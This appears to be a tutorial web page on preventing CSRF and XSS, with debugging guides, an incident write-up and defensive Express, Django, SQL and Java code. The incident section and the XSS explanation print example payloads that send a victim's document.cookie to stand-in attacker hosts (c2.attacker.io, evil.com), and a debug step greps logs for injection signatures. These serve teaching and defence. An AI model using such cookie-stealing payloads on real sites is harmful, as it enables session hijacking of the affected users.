into every input field in your application \u2014 search boxes, form fields, URL parameters, profile fields, comment boxes. If an alert box appears showing your domain name, you have a reflected or stored XSS vulnerability at that injection point. The document.domain payload confirms you're executing on your origin, not just getting a JavaScript syntax error.\n\nAlso test event handler injection for cases where your application filters script tags: try , , and click. Many filters block script tags but miss event handler injection.\n\nFor a more thorough automated scan, OWASP ZAP (free) and Burp Suite (professional tier) both include XSS scanners that crawl your application and test input fields systematically. These catch cases that manual testing misses, particularly in complex multi-step flows. Run them in a staging environment \u2014 aggressive scanning against production can create stored XSS test payloads that reach real users."}}, {"@type":"Question","name":"What is a 'Nonce' in the context of CSP?","acceptedAnswer":{"@type":"Answer","text":"A nonce \u2014 short for 'number used once,' though in practice it's a random string used once per request rather than a sequential number \u2014 is a cryptographically random value that your server generates fresh for each HTTP response.\n\nYou include the nonce in two places simultaneously: the CSP header (script-src 'self' 'nonce-abc123xyz') and the nonce attribute of every inline script tag you want to allow (). The browser only executes inline scripts whose nonce attribute matches the value in the CSP header.\n\nBecause the nonce changes with every request and attackers cannot predict or retrieve it before their injection executes, injected script tags \u2014 which won't have the correct nonce \u2014 are blocked by the browser. This lets you maintain necessary inline scripts (server-rendered initialization code, state hydration) while blocking arbitrary injection, without falling back to 'unsafe-inline' which would permit everything."}}, {"@type":"Question","name":"Should I store CSRF tokens in cookies or server-side sessions?","acceptedAnswer":{"@type":"Answer","text":"Server-side sessions are the stronger choice for most applications. When the CSRF token is stored in the session (server-side), it never travels in a cookie that JavaScript can read. The session cookie itself can be HttpOnly, making the token completely inaccessible to any JavaScript \u2014 including XSS payloads. The server compares the submitted token against the session-stored value, and the token is only ever visible in the HTML of the page it's embedded in.\n\nCookie-based CSRF tokens (the Double Submit pattern) are pragmatic for stateless services or APIs that can't maintain server-side session state. They work because an attacker can't read cookies across origins. But they share the XSS vulnerability: if an attacker achieves XSS on your domain, they can read the non-HttpOnly CSRF cookie with document.cookie and forge both sides of the comparison.\n\nThe rule I apply: use session-stored CSRF tokens with HttpOnly, Secure, SameSite=Strict session cookies as the default. Use Double Submit only when statelessness is a genuine architectural requirement, and ensure XSS prevention is especially solid in that case since it's the main attack vector against that pattern."}} ] } Skip to content
Home System Design CSRF and XSS Prevention: How to Actually Secure Your Web App

CSRF and XSS Prevention: How to Actually Secure Your Web App

Where developers are forged. · Structured learning · Free forever.
📍 Part of: Security → Topic 5 of 10
CSRF and XSS prevention explained deeply — understand why these attacks work, how tokens and sanitization stop them, with real code examples and common mistakes.
⚙️ Intermediate — basic System Design knowledge assumed
In this tutorial, you'll learn
CSRF and XSS prevention explained deeply — understand why these attacks work, how tokens and sanitization stop them, with real code examples and common mistakes.
  • CSRF exploits the browser's automatic cookie attachment — CSRF tokens are the primary server-side mechanism for verifying that the user actually intended the request, not just that they have a valid session
  • XSS is categorically more dangerous than CSRF because it can read the DOM, exfiltrate tokens, bypass CSRF protection, and in its stored form affects every future visitor without requiring any interaction
  • Output encoding stops XSS injection at the HTML parsing level; CSP stops execution at the browser enforcement level — you need both, because encoding is fallible and CSP catches what slips through
✦ Plain-English analogy ✦ Real code with output ✦ Interview questions
Quick Answer
  • CSRF abuses the browser's automatic cookie attachment — the server trusts the session, not the user's intent
  • XSS injects executable scripts into your pages — the user trusts your site, and the attacker exploits that trust
  • CSRF tokens verify intent by requiring a secret the attacker's origin cannot read (same-origin policy blocks it)
  • Output encoding treats user input as data, never markup — HTML-encode before rendering to stop XSS at the source
  • CSP headers provide a second layer — even if a payload slips through encoding, the browser refuses to execute unauthorized scripts
  • Biggest mistake: assuming SameSite=Lax alone stops CSRF — it still allows cookies on top-level GET navigation from external links
🚨 START HERE
Security Vulnerability Quick Debug
Immediate actions when CSRF or XSS issues are suspected in production — start here before escalating
🟡Suspected active XSS in production
Immediate ActionCheck server logs for injection pattern signatures and immediately verify whether a CSP header is present and effective. If no CSP is deployed, that is the first thing to fix — it limits ongoing damage even before you identify the injection point.
Commands
grep -r '<script\|onerror\|onload\|javascript:' /var/log/nginx/access.log | tail -50
curl -sI https://yourapp.com | grep -i content-security-policy
Fix NowDeploy a CSP header immediately as an emergency mitigation. A restrictive policy blocks script execution and exfiltration even if the injection point hasn't been found yet: Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'. Then audit CSP violation reports (if report-uri or report-to is configured) to identify where payloads are being injected.
🟡CSRF token rejected on all POST requests after a recent deployment
Immediate ActionRecent deployments that touch session configuration, middleware ordering, or cookie settings are the most common cause of sudden universal CSRF rejection. Verify that session middleware still loads before CSRF middleware in your stack, and that no cookie domain or path settings changed that would prevent the session cookie from being sent.
Commands
curl -s -c cookies.txt -b cookies.txt https://yourapp.com/form | grep '_csrf'
curl -s -b cookies.txt -X POST -d '_csrf=BAD_TOKEN' https://yourapp.com/submit -w '%{http_code}'
Fix NowEnsure session middleware loads before CSRF middleware — this is the most common ordering mistake in Express. Check cookie-parser initialization order. Verify that the session store (Redis, database) is reachable and not returning errors that cause silent session creation failures, which would generate new CSRF tokens on every request and make every submission look like a mismatch.
🟡HttpOnly cookie appears accessible via document.cookie in browser console
Immediate ActionVerify the Set-Cookie response header actually contains the HttpOnly flag — the most common cause is that the flag is set in one code path (login) but not another (session refresh or remember-me token generation). Check all paths that create or update session cookies.
Commands
curl -sI https://yourapp.com/login -X POST -d 'user=test&pass=test' | grep -i set-cookie
python3 -c "import http.cookies; c=http.cookies.SimpleCookie(); c.load('session=abc; HttpOnly'); print(c['session']['httponly'])"
Fix NowSet all session cookies with the full security triple: { httpOnly: true, secure: true, sameSite: 'strict' }. In Express this goes in the session() middleware configuration. Audit every location in your codebase that calls res.cookie() or sets a Set-Cookie header directly — any one of them missing HttpOnly is an XSS exposure for that cookie.
Production IncidentStored XSS in User Profile Exfiltrates Admin Session TokensAn attacker injected a stored XSS payload into their display name field, which executed silently for every admin who viewed the user management dashboard — exfiltrating 12 admin session tokens over 3 days before detection.
SymptomThe security team noticed a pattern of outbound HTTP requests from the admin dashboard to an external domain that had no business relationship with the company. Within hours, admin accounts began performing unauthorized actions: role escalations, API key generation, and bulk user data exports. The actions looked legitimate at the session level — they were coming from authenticated admin sessions — which is why automated anomaly detection didn't fire immediately.
AssumptionThe engineering team believed their Django template engine automatically escaped all output, which it does — by default. The critical assumption failure was that this protection was universal. The admin dashboard had been built by a different team under a tight deadline, and one template block had been deliberately marked as safe to support a 'rich display name' feature that was later abandoned. The autoescape directive was never reverted.
Root causeThe display_name field was rendered without escaping inside a Django admin template block marked {% autoescape off %}. This directive was originally added to allow HTML formatting in display names — a feature that shipped for two weeks before being removed from the UI. The template directive was never cleaned up. The attacker set their display name to: <img src=x onerror="fetch('https://c2.attacker.io/exfil?s='+document.cookie)">. Every admin dashboard page load triggered the fetch, sending the admin's session cookie to the attacker's collection server. Because the exfiltration used a standard image load failure pattern rather than a script tag, it bypassed a naive XSS filter that was scanning for opening script tags.
FixImmediate response: removed {% autoescape off %} from all admin templates. Invalidated and rotated all 12 compromised admin session tokens. Blocked the attacker's collection domain at the WAF layer. Medium-term fixes: added DOMPurify sanitization on all user-generated fields at the point of input processing. Implemented a strict CSP header — Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none' — which would have blocked the fetch() exfiltration call even with the XSS payload present. Added a template audit step to the CI pipeline that flags any use of autoescape off, safe filter, or mark_safe() in templates rendering user-supplied fields.
Key Lesson
Never disable autoescape in templates rendering user-supplied data — if you need formatted output, use a sanitization library like DOMPurify, not raw rendering directivesCSP headers with a strict connect-src policy would have blocked the exfiltration fetch() call even with the XSS payload fully executing — defense in depth saved nothing here because CSP wasn't deployedAudit every template file for autoescape off, mark_safe(), |safe filters, and equivalent raw rendering directives in your stack — make this part of your security-focused CI checkStored XSS is categorically more dangerous than reflected XSS: it executes on every page load for every user who views the affected content, not just the one person who clicks a crafted linkXSS payloads don't require script tags — img onerror, svg onload, and a dozen other event handlers achieve the same execution. Filtering for script is not a defense.
Production Debug GuideSymptom-driven diagnosis for web security vulnerabilities — what to check first when something looks wrong
CSRF token mismatch errors on legitimate form submissionsFirst, establish whether the token is being stored in the session or in a cookie — they are not interchangeable. If stored in session, verify the session middleware is initialized before the CSRF middleware in your stack (middleware order bugs cause exactly this symptom in Express). Check that the token is being submitted as a hidden form field named correctly for your library, or as an X-CSRF-Token header for AJAX requests. Also check for load balancer configurations that route requests to different servers without shared session storage — stateful CSRF tokens require sticky sessions or a shared session backend like Redis.
User-submitted HTML renders as raw markup instead of as escaped textCheck whether output encoding is being applied at render time, not at storage time. In Django, verify that autoescape is ON in the relevant template and that no |safe filter or mark_safe() call is wrapping the field. In React, ensure you are not using dangerouslySetInnerHTML — if you are, verify that the content passed to it has been run through DOMPurify first. In server-rendered templates generally, search for any pattern that passes a user-supplied variable through a 'raw' or 'unescaped' function.
CSP header is present in responses but scripts from external CDNs still loadOpen DevTools > Network, find any script request, and inspect the response headers of your HTML document — not the script itself. Look at the actual Content-Security-Policy value. Check whether script-src includes 'unsafe-inline', a wildcard (), or overly broad domain allowances like .cloudflare.com. Any of these effectively nullifies XSS protection. Also check whether your CSP is delivered in a meta http-equiv tag rather than an HTTP header — meta-delivered CSP cannot restrict certain directives like frame-ancestors and is less reliable across browser implementations.
SameSite cookie attribute is set in your code but the browser isn't sending it correctlyVerify the cookie is being set over HTTPS — SameSite=Strict and SameSite=Lax are not reliably enforced on non-HTTPS origins in modern browsers, and some browsers silently downgrade or ignore the attribute on HTTP. Check whether you're testing in a browser that's old enough to predate SameSite support (pre-Chrome 80, pre-Firefox 79). Also verify your local development environment isn't running on HTTP while production runs on HTTPS — cookie behavior differences between environments cause exactly this class of hard-to-reproduce bug.
Login redirects cause CSRF token validation failures on the next POST requestCSRF token mismatch after login is almost always a session fixation / session rotation issue. When a user logs in, the session ID must be rotated — the pre-login session token is invalid for the authenticated session. Verify that your framework's login() function rotates the session automatically (Django's does; Express requires req.session.regenerate() to be called explicitly). After rotation, the CSRF token must also be regenerated and re-injected into any forms that were already rendered with the old token.

CSRF and XSS have been fully understood since the early 2000s — and they still sit near the top of the OWASP Top 10 because developers keep underestimating them. The vulnerabilities aren't exotic. They don't require nation-state tooling or zero-day exploits. A misconfigured form, a single unescaped variable, or one missing HTTP header is all it takes.

The 2018 British Airways breach that exposed 500,000 customers' payment details was traced to injected XSS scripts that silently exfiltrated card data as customers typed it into the checkout form. The attackers were present in that page for more than two weeks before detection. CSRF has been used to hijack home router configurations, drain account balances, and post content without consent on social platforms at scale. These are not theoretical risks — they are production incidents that happened to teams who thought they had this covered.

What makes both attacks particularly dangerous in 2026 is the ecosystem complexity. Modern applications run third-party analytics scripts, CDN-hosted libraries, A/B testing frameworks, and marketing pixels. Each one is a potential injection surface. Your Content Security Policy has to account for all of it, or it accounts for none of it effectively.

This guide covers how each attack works at the HTTP level, why standard defenses actually stop them, where developers routinely create gaps in those defenses without realizing it, and what common shortcuts create a false sense of security. The goal is not a checklist — it's a mental model that lets you reason about new attack patterns as they emerge.

How CSRF Actually Works — and Why Cookies Are the Root Cause

To understand CSRF, you need to understand one browser behavior that most developers take for granted and rarely think critically about: browsers automatically attach cookies to every request made to a domain, regardless of which site triggered that request.

This is not a bug. It's by design — the mechanism that makes 'stay logged in' work across page navigations and external links. But it creates a fundamental trust problem. If you're logged into bank.com and have a session cookie, and you visit evil.com, that malicious page can fire a form POST to bank.com/transfer. Your browser will attach your bank.com session cookie to that request automatically. The bank's server sees a valid authenticated session and processes the transfer. You never interacted with the bank's site at all.

The critical observation: the attacker doesn't need to know your cookie. They don't steal it. They just need to construct a request that your browser will make for them — and the browser's cookie-attachment behavior does the rest.

The CSRF token pattern defeats this by introducing a secret value that the attacker cannot know. The token lives inside the HTML of bank.com's pages. The same-origin policy prevents evil.com from reading bank.com's page content — so the attacker cannot retrieve the token. They can forge a request, but they cannot forge a valid token. The server rejects any POST without a valid token.

The SameSite cookie attribute takes a different approach: it tells the browser not to attach the cookie on cross-site requests at all. SameSite=Strict means the cookie is never sent on any cross-site request. SameSite=Lax allows it on top-level GET navigations (clicking a link) but blocks it on cross-site POST, PUT, and DELETE requests. Neither replaces CSRF tokens for high-security operations — SameSite is browser-enforced and has compatibility nuances; CSRF tokens are server-enforced and don't rely on browser policy.

csrf_protection_express.js · JAVASCRIPT
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071
// io.thecodeforge: Secure-by-default CSRF implementation
// Stack: Express 4.x + express-session + csurf
// Middleware order is not optional — session must initialize before CSRF

const express = require('express');
const session = require('express-session');
const cookieParser = require('cookie-parser');
const csrf = require('csurf');

const app = express();

// Body parser must come before CSRF middleware
app.use(express.urlencoded({ extended: false }));
app.use(cookieParser());

// Session middleware must initialize before CSRF middleware
// If session is unavailable, CSRF token generation fails silently in some configs
app.use(session({
  secret: process.env.SESSION_SECRET,  // Never hardcode — use env var
  resave: false,
  saveUninitialized: false,
  cookie: {
    httpOnly: true,                                          // Blocks JS access to cookie
    secure: process.env.NODE_ENV === 'production',           // HTTPS only in prod
    sameSite: 'strict',                                      // First line of CSRF defense
    maxAge: 1000 * 60 * 60 * 8                               // 8-hour session lifetime
  }
}));

// csrf({ cookie: false }) stores token in session, not a cookie
// This is more secure: token never travels in a cookie that could be read
const csrfProtection = csrf({ cookie: false });

// GET: render form with fresh CSRF token embedded as hidden field
app.get('/transfer', csrfProtection, (req, res) => {
  const csrfToken = req.csrfToken();

  // Token is embedded in HTML — evil.com cannot read it due to same-origin policy
  res.send(`
    <form method="POST" action="/transfer">
      <input type="hidden" name="_csrf" value="${csrfToken}" />
      <label>Amount: <input type="number" name="amount" min="1" /></label>
      <button type="submit">Transfer</button>
    </form>
  `);
});

// POST: csurf middleware validates _csrf field against session-stored token
// Mismatch => 403 ForbiddenError thrown automatically
app.post('/transfer', csrfProtection, (req, res) => {
  // If we reach here, the CSRF token was valid
  // Proceed with the actual transfer logic
  const { amount } = req.body;
  // ... transfer logic ...
  res.send(`Transfer of $${amount} validated and completed.`);
});

// Centralized CSRF error handler — always provide this or Express will 500
app.use((err, req, res, next) => {
  if (err.code === 'EBADCSRFTOKEN') {
    // Log this event — repeated CSRF failures from one IP is an attack signal
    console.warn(`CSRF violation: ${req.ip} -> ${req.path}`);
    return res.status(403).json({
      error: 'Invalid or missing CSRF token',
      code: 'CSRF_VIOLATION'
    });
  }
  next(err);
});

app.listen(3000, () => console.log('Server running on http://localhost:3000'));
▶ Output
Server running on http://localhost:3000
Mental Model
Why CSRF Tokens Work
The attacker can trigger cross-site requests, but they cannot read cross-site responses. The CSRF token lives in the response. An attacker who cannot read it cannot forge it.
  • Browsers auto-attach cookies to all same-domain requests regardless of which site initiated them — this is the root cause of CSRF, not a server misconfiguration
  • Same-origin policy prevents evil.com from reading bank.com's page content — the CSRF token embedded in HTML is invisible to the attacking origin
  • CSRF tokens live inside page HTML — the attacker can fire the request but cannot supply the correct token value without being able to read the page
  • SameSite=Strict blocks the cookie entirely on cross-site requests — it's a free, browser-enforced first line of defense but requires server-side tokens as the primary defense
  • Double Submit Cookie pattern works for stateless APIs: token goes in a cookie AND in the request header or body — the server compares both values. The attacker can't read the cookie, so they can't set the matching header.
  • SameSite=Lax still allows cookies on top-level GET navigations — never rely on Lax alone for state-changing operations, even if they nominally use GET
📊 Production Insight
CSRF tokens stored in cookies (Double Submit pattern) are a pragmatic choice for stateless APIs, but they carry a specific risk: if an XSS vulnerability exists anywhere on your domain, an attacker can read that cookie with document.cookie and forge the header to match. The Double Submit pattern's security guarantee depends entirely on the attacker being unable to read the cookie value — and XSS destroys that guarantee.
The per-session vs per-request token trade-off is real and worth understanding. Per-request tokens (a new token generated for every form, invalidated after use) provide stronger protection against certain replay scenarios but break browser back-button behavior — the back button restores the old form with an invalidated token, causing confusing 403 errors for legitimate users. Per-session tokens are the right default for most applications. Reserve per-request tokens for high-value, high-sensitivity operations like wire transfers, password changes, and account deletion.
🎯 Key Takeaway
CSRF works because browsers auto-attach cookies — not because your server is broken. Tokens defeat CSRF by requiring a value the attacker's origin cannot read, regardless of what cookies they can trigger being sent. SameSite cookies are your free first line — implement them — but never your only line. Defense in depth means both.
CSRF Defense Selection
IfServer-rendered application with session-based authentication
UseUse synchronizer token pattern — embed token in hidden form fields, validate on every state-changing POST/PUT/DELETE. Session middleware must load before CSRF middleware.
IfStateless REST API with no server-side session
UseUse Double Submit Cookie — generate a random token, set it in a non-HttpOnly cookie, require the same value in an X-CSRF-Token request header. Server compares both values.
IfSPA using JWT in Authorization header (not in cookies)
UseCSRF does not apply — the browser will not automatically attach the Authorization header to cross-site requests. You've traded CSRF risk for XSS risk: protect localStorage tokens carefully.
IfMixed architecture with both server-rendered pages and API endpoints
UseUse synchronizer tokens for form submissions and X-CSRF-Token header for AJAX requests. Expose a /csrf-token endpoint that returns a fresh token for SPA initialization.

How XSS Works — and Why Output Encoding Is Non-Negotiable

XSS happens when your application takes untrusted data and renders it in a browser context where the browser interprets it as executable HTML or JavaScript, instead of as inert plain text. The attacker doesn't break into your server. They convince your server to deliver their payload to your users on your behalf.

There are three distinct types, and understanding the difference matters for defense:

Reflected XSS: the malicious script is embedded in a URL parameter and your server reflects it back unsanitized in the response. It only affects the user who loads the crafted URL. The attack requires social engineering — the victim must click a link. Example: search?q=<script>document.location='https://evil.com/?c='+document.cookie</script>.

Stored XSS: the payload is saved to your database through a form submission — a comment, a display name, a profile bio — and then served to every user who views that content. This is categorically more dangerous because it executes on every page load without requiring the victim to click anything. One stored payload can compromise thousands of users.

DOM-based XSS: the injection happens entirely in client-side JavaScript. The server is never involved. Your own JavaScript reads from an untrusted source — URL hash, query parameters, postMessage events — and writes it to innerHTML or calls eval() on it. This variant is invisible to server-side WAFs and log analysis.

The primary defense for all three is output encoding: treating user input as data, never as markup. HTML-encode every character that could be interpreted as HTML structure before rendering it. An angle bracket becomes &lt;. A quote becomes &quot;. The browser renders the text literally instead of parsing it as HTML.

Output encoding must happen at render time, in the correct context. There are at least four distinct encoding contexts: HTML body, HTML attribute, JavaScript string, and URL. Encoding for the wrong context either doesn't protect you or double-encodes your content into garbage. Most modern template engines handle HTML body context automatically — the danger is when you opt out, or when you render into JavaScript or URL contexts without realizing it.

xss_prevention_django.py · PYTHON
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172
# io.thecodeforge: XSS mitigation patterns — Django
# Three layers: template engine auto-escape, manual escape for logic contexts,
# and CSP middleware as the browser-level enforcement layer

from django.shortcuts import render
from django.utils.html import escape, format_html
from django.http import HttpResponse


def user_profile(request, username):
    """
    Renders a user profile page.

    Django templates auto-escape variables by default, so {{ username }}
    in a template is safe. The manual escape() call here is for cases where
    the value is used in Python string formatting before being passed to
    the template — for example, building a log message or an error string.

    Never use format_html() with f-strings or % formatting.
    format_html() must do the interpolation itself to apply escaping.
    """
    # Auto-escaped in templates: {{ username }} is safe without extra steps
    # Manual escape for use in Python-side string construction
    safe_username = escape(username)

    # format_html is the correct way to construct HTML strings in Python code
    # It escapes all interpolated values — unlike f-strings which do not
    profile_heading = format_html('<h1>Profile: {}</h1>', username)

    return render(request, 'profile.html', {
        'username': safe_username,
        'profile_heading': profile_heading,
    })


class ForgeCSPMiddleware:
    """
    Centralized Content Security Policy enforcement.

    Placed in middleware so every response — including error pages,
    redirects, and static file responses — gets the CSP header.

    CSP is the browser-level backstop: even if an XSS payload slips
    through encoding, a strict CSP blocks execution and exfiltration.

    Header breakdown:
      default-src 'self'     — default fallback: only load from same origin
      script-src 'self'      — no inline scripts, no external script hosts
      connect-src 'self'     — fetch/XHR can only reach same origin
                               (blocks cookie exfiltration via fetch)
      object-src 'none'      — blocks Flash, ActiveX, and plugin-based XSS
      frame-ancestors 'none' — equivalent to X-Frame-Options: DENY
    """
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        response = self.get_response(request)

        response['Content-Security-Policy'] = (
            "default-src 'self'; "
            "script-src 'self'; "
            "connect-src 'self'; "
            "object-src 'none'; "
            "frame-ancestors 'none'"
        )
        # Prevents MIME-type sniffing attacks on script/style resources
        response['X-Content-Type-Options'] = 'nosniff'
        # Belt-and-suspenders clickjacking protection alongside frame-ancestors
        response['X-Frame-Options'] = 'DENY'

        return response
▶ Output
Response headers applied: Content-Security-Policy, X-Content-Type-Options, X-Frame-Options
⚠ innerHTML Is an XSS Open Door — and It Shows Up More Than You'd Think
The most common XSS vector in modern React and Vue applications isn't in server templates — it's in JavaScript code that does element.innerHTML = userContent or React's dangerouslySetInnerHTML={{ __html: userContent }}. Developers reach for these when they need to render formatted text — markdown output, rich text editor content, localized strings with embedded HTML. The fix is not to avoid them entirely but to never pass them unsanitized content. Always run content through DOMPurify.sanitize() before assigning it to innerHTML or dangerouslySetInnerHTML. For plain text, use element.textContent instead — it cannot be interpreted as HTML regardless of what the string contains.
📊 Production Insight
Stored XSS is roughly an order of magnitude more dangerous than reflected XSS in practice — not because the payload is different, but because of reach and persistence. A reflected XSS requires the attacker to deliver a crafted URL to each victim individually. A stored XSS sitting in a popular comments section, a user bio rendered in a sidebar, or a product review displayed on a high-traffic page executes for every visitor automatically, indefinitely, until discovered and removed.
The encoding-at-render-time rule exists for a reason that isn't immediately obvious: if you HTML-encode user input before storing it in the database, you corrupt the data for every non-HTML context it's ever used in. The stored string goes into emails as &lt;script&gt;. It goes into CSV exports with HTML entities in the cells. It goes into API responses as mangled JSON strings. Store raw. Encode at render time, in the correct context for each output destination.
🎯 Key Takeaway
XSS is not a browser bug — it is your application injecting attacker code into your own pages. Output encoding stops injection at the HTML parsing level. CSP stops execution at the browser enforcement level. Use both — encoding is the seatbelt that prevents the crash; CSP is the airbag that limits damage when something gets through.

Defense Persistence: Audit Logging Security Events

Deploying CSRF tokens and output encoding is the prevention layer. Audit logging is the detection layer — and without detection, you won't know when prevention has failed until the damage is done.

Every blocked CSRF attempt should be logged. Not because the individual block matters, but because a burst of CSRF violations from a single IP or targeting a specific endpoint is an attack signal. Alone, each blocked request is noise. In aggregate, they reveal a probing pattern.

XSS detection is harder because a successful XSS payload executes in the victim's browser, not on your server. CSP violation reports (via report-uri or report-to directives) are the most practical server-side signal that an injection is occurring. Every time the browser blocks a script execution that violates your CSP, it can send a JSON report to an endpoint you control. Those reports identify the blocked resource, the violated directive, and the page where it happened — which is often enough to locate the injection point.

The schema below captures both event types in a form that supports both real-time alerting and forensic investigation. The payload_preview field is deliberately truncated — you want enough to identify the attack pattern, but you never want full credentials, tokens, or session data in your logs.

io/thecodeforge/db/security_audit.sql · SQL
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647
-- io.thecodeforge: Security Event Tracking Schema
-- Captures CSRF violations and XSS detection events for alerting and forensics

CREATE TABLE io.thecodeforge.security_logs (
    id            SERIAL PRIMARY KEY,
    event_type    VARCHAR(50)   NOT NULL,  -- 'CSRF_BLOCKED', 'XSS_DETECTED', 'CSP_VIOLATION'
    severity      VARCHAR(10)   NOT NULL DEFAULT 'HIGH',  -- 'LOW', 'MEDIUM', 'HIGH', 'CRITICAL'
    source_ip     INET,
    user_agent    TEXT,
    request_path  TEXT,
    http_method   VARCHAR(10),
    user_id       INTEGER,                -- NULL for unauthenticated requests
    session_id    VARCHAR(64),            -- Hashed session ID for correlation, never raw
    payload_preview TEXT,                 -- Truncated at 500 chars — never log full tokens
    csp_blocked_uri TEXT,                 -- Populated for CSP_VIOLATION events
    created_at    TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP
);

-- Index for real-time alerting queries: detect burst of violations from one IP
CREATE INDEX idx_security_logs_ip_time
    ON io.thecodeforge.security_logs (source_ip, created_at DESC);

-- Index for event-type dashboards
CREATE INDEX idx_security_logs_event_type
    ON io.thecodeforge.security_logs (event_type, created_at DESC);

-- Example: log a CSRF violation
INSERT INTO io.thecodeforge.security_logs
    (event_type, severity, source_ip, request_path, http_method, payload_preview)
VALUES
    ('CSRF_BLOCKED', 'HIGH', '192.168.1.1', '/api/v1/transfer', 'POST',
     '_csrf=FORGED_TOKEN_TRUNCATED...');

-- Alert query: more than 10 CSRF violations from one IP in the last 60 seconds
-- Run this as a scheduled job or connect to PagerDuty via your SIEM
SELECT
    source_ip,
    COUNT(*) AS violation_count,
    MIN(created_at) AS first_seen,
    MAX(created_at) AS last_seen
FROM io.thecodeforge.security_logs
WHERE
    event_type = 'CSRF_BLOCKED'
    AND created_at > NOW() - INTERVAL '60 seconds'
GROUP BY source_ip
HAVING COUNT(*) > 10
ORDER BY violation_count DESC;
▶ Output
Audit log entry created. Alert query returns IPs exceeding violation threshold.
💡Connect Logs to Alerting — Logs Alone Protect Nobody
A security log that nobody reads in real time is compliance documentation, not security infrastructure. Wire your security_logs table to a SIEM alert or a simple cron job that calls PagerDuty when CSRF_BLOCKED events exceed a threshold from a single IP within a rolling time window. The alert query in the schema above is a starting point — tune the threshold based on your normal traffic volume before it becomes noise.
📊 Production Insight
Security logs without alerting are write-only data. They protect no one in real time, and they're only useful forensically after an incident that you already know happened. The two event types worth alerting on immediately: more than 10 CSRF violations from a single IP in 60 seconds (automated attack script), and any CSP_VIOLATION event from a page that renders user-supplied content (potential active XSS injection).
CSP violation reports deserve special attention because they fire even when your encoding is correct — an attacker probing for injection points will trigger CSP violations before they find a successful bypass. Treating CSP reports as low-priority noise means ignoring the earliest warning signal you have.
🎯 Key Takeaway
Audit logs prove what happened after the fact. Alerting on those logs prevents the next thing from happening. Log the payload preview for forensics, but never log full tokens, passwords, or session IDs — your log infrastructure has a different, usually broader access control surface than your application.

Enterprise Integration: The Java Security Filter

For Java-based backends — Spring Boot services, Jakarta EE applications, legacy Servlet containers — centralized security header enforcement belongs in a Filter, not in individual controllers. Controllers are business logic. Security headers are infrastructure. Mixing them means one new endpoint written by an engineer who wasn't thinking about security ships without the headers.

A Filter runs on every request-response cycle regardless of which controller handles the request. It covers 200s, 404s, 500s, redirects, and OPTIONS preflight responses. In a microservices context, this filter belongs in a shared security library deployed as a dependency across all services — so adding a new service means inheriting the security headers automatically, not remembering to copy-paste them.

The headers below represent the minimum bar for a production Java service in 2026. They're not exhaustive — Permissions-Policy, Cross-Origin-Resource-Policy, and Cross-Origin-Opener-Policy are worth adding for high-security contexts — but these five cover the most impactful attack vectors with essentially zero performance overhead.

io/thecodeforge/security/SecurityHeaderFilter.java · JAVA
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677
package io.thecodeforge.security;

import jakarta.servlet.Filter;
import jakarta.servlet.FilterChain;
import jakarta.servlet.FilterConfig;
import jakarta.servlet.ServletException;
import jakarta.servlet.ServletRequest;
import jakarta.servlet.ServletResponse;
import jakarta.servlet.annotation.WebFilter;
import jakarta.servlet.http.HttpServletResponse;
import java.io.IOException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * io.thecodeforge: Centralized Security Header Enforcement
 *
 * Applies all required security response headers on every HTTP response.
 * Implemented as a Filter rather than individual controller annotations
 * to guarantee 100% coverage — including error pages, redirects,
 * static resource responses, and any future endpoints.
 *
 * Deploy in shared-security-lib and import as a dependency across services.
 * Do not copy this class into individual service repositories.
 */
@WebFilter(urlPatterns = "/*")  // Intercept every request path
public class SecurityHeaderFilter implements Filter {

    private static final Logger log = LoggerFactory.getLogger(SecurityHeaderFilter.class);

    // CSP value extracted to a constant — change once, applies everywhere
    // Tighten script-src per-service using subclass overrides if needed
    private static final String CSP_POLICY =
        "default-src 'self'; " +
        "script-src 'self'; " +
        "connect-src 'self'; " +
        "object-src 'none'; " +
        "frame-ancestors 'none'";

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        log.info("SecurityHeaderFilter initialized — all responses will carry security headers");
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {

        HttpServletResponse response = (HttpServletResponse) res;

        // Clickjacking protection: prevents your pages from being embedded in iframes
        // frame-ancestors in CSP is the modern equivalent; X-Frame-Options for older browsers
        response.setHeader("X-Frame-Options", "DENY");

        // Prevents browser MIME-type sniffing — a vector for content-type confusion attacks
        response.setHeader("X-Content-Type-Options", "nosniff");

        // Content Security Policy: restricts which sources of scripts, styles,
        // and connections are permitted — browser-enforced XSS mitigation layer
        response.setHeader("Content-Security-Policy", CSP_POLICY);

        // Enforce HTTPS for all future requests from this origin
        // max-age=31536000 = 1 year; includeSubDomains extends to all subdomains
        response.setHeader("Strict-Transport-Security",
            "max-age=31536000; includeSubDomains; preload");

        // Prevents Referer header from leaking your origin URL to third-party resources
        response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin");

        chain.doFilter(req, res);
    }

    @Override
    public void destroy() {
        log.info("SecurityHeaderFilter destroyed");
    }
}
▶ Output
SecurityHeaderFilter initialized — all responses will carry security headers
🔥Why a Centralized Filter Instead of Controller Annotations?
Scattering security headers across individual controllers creates an inevitability problem: some endpoint will be added without them. A new engineer writes an exception handler. A framework generates an error page. A health-check endpoint gets added quickly. None of them get the headers because adding security headers wasn't part of anyone's mental model for that task. A servlet filter runs on every response without exception, including the ones nobody thought to protect. That's the only coverage guarantee that actually holds.
📊 Production Insight
Security headers set in individual controllers are a maintenance liability disguised as a security feature. They work until they don't — until someone adds a new endpoint, modifies an error handler, or upgrades a framework that generates its own responses for certain status codes. I've seen production security scans flag services that had 95% coverage from controller-level header setting, with the missing 5% being 404 pages and exception responses that the WAF wasn't watching.
The Strict-Transport-Security header in the filter above is particularly important: it tells browsers to never make HTTP requests to your domain, only HTTPS — for up to a year after the first visit. Without it, an attacker can intercept the initial HTTP request on an unsecured network and strip the HTTPS redirect before the user's browser has a chance to upgrade. This is the HSTS downgrade attack, and it's still practical on public Wi-Fi.
🎯 Key Takeaway
